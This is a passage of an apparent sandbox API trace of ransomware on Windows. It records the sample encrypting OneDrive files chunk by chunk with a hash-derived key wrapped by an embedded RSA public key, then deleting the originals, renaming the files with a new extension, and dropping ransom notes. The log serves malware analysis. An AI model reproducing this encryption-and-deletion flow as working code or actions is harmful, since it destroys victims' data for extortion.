nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.053] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.053] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.053] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.054] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.054] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.054] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.054] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.054] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.054] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.055] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.055] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.055] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.055] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.055] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.055] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.055] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x1d0, lpOverlapped=0x0) returned 1 [0281.055] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x1d0, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x1e0) returned 1 [0281.055] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x1e0, lpOverlapped=0x0) returned 1 [0281.055] CloseHandle (hObject=0x5d68) returned 1 [0281.055] CloseHandle (hObject=0x5d4c) returned 1 [0281.056] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.062] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.062] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.065] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.066] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0281.066] CryptDestroyKey (hKey=0x2fc308) returned 1 [0281.066] CryptReleaseContext (hProv=0x2f1ecc8, dwFlags=0x0) returned 1 [0281.066] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.067] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0281.067] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\readme_back_files.htm")) returned 0xffffffff [0281.067] AreFileApisANSI () returned 1 [0281.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0281.067] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.068] GetFileType (hFile=0x5d3c) returned 0x1 [0281.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.069] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.069] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0281.070] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.070] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.070] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.070] GetLastError () returned 0x0 [0281.070] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.070] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.071] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0281.072] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d68 [0281.110] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.111] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1e910) returned 1 [0281.113] CryptCreateHash (in: hProv=0x2f1e910, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.113] lstrlenA (lpString="OJqEEUaHrEmqTOCUsZRXkTNKzMlQm") returned 29 [0281.113] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.113] CryptDeriveKey (in: hProv=0x2f1e910, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc408) returned 1 [0281.114] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.114] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.114] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1f108) returned 1 [0281.114] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1f108, dwCertEncodingType=0x1, pInfo=0x2f377e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37810*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37818*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc588) returned 1 [0281.114] CryptEncrypt (in: hKey=0x2fc588, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.114] CryptEncrypt (in: hKey=0x2fc588, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e228*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e228*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.115] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f1e228*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e228*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.116] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.118] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.118] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.120] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.120] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.120] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.121] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.121] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.121] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.121] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.121] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.121] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.121] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.121] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.121] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.121] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.121] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.121] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.122] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.122] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.122] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.122] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.122] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.122] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.122] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.122] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.122] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.122] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.122] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.122] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.123] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, 